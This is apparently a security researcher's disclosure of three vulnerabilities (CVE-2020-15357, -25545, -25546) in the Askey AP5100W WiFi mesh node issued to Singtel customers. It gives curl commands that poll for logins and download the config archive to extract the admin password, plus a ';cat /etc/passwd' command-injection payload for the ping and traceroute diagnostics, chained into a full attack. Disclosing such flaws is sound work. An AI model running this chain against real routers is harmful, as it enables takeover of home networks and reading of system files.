Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.
The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.
The default login credential of the web interface for the Askey AP5100W is as follows:
A user is able to perform network diagnostics on the wifi mesh node post authentication by clicking tools > Network Analysis
. A user has a choice of testing using ping
, traceroute
, or route
. For ping
and traceroute
, the user input is not sanitised and a trivial command injection can be performed by appending ;cat /etc/passwd
to the commands.
An attacker could combine all the 3 vulnerabilities (CVE-2020-15357, CVE-2020-25545, CVE-2020-25546), an attacker who is on the network, regardless of guest access or adjacent network, as long as he is able to reach the web interface, he can set up a script to constantly call
curl http://192.168.1.7/status.cgi?_=1590132976934&nvget=sysinfo
to check if anyone has logged into the web interface.
As soon as the response is not {"login":"0"}
, run the following command to obtain the admin login password for the web interface.
curl 'http://IP_ADDR_OF_WEB_INTERFACE/setup/toolsConfigDownload.htm?_=1590131613045' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://IP_ADDR_OF_WEB_INTERFACE/'
curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar | grep gui_pwd
Once in web interface, click tools > Network Analysis
and choose either ping
or traceroute
to inject commands with ;cat /etc/passwd
The vendor didn’t replied to us despite all the efforts we made.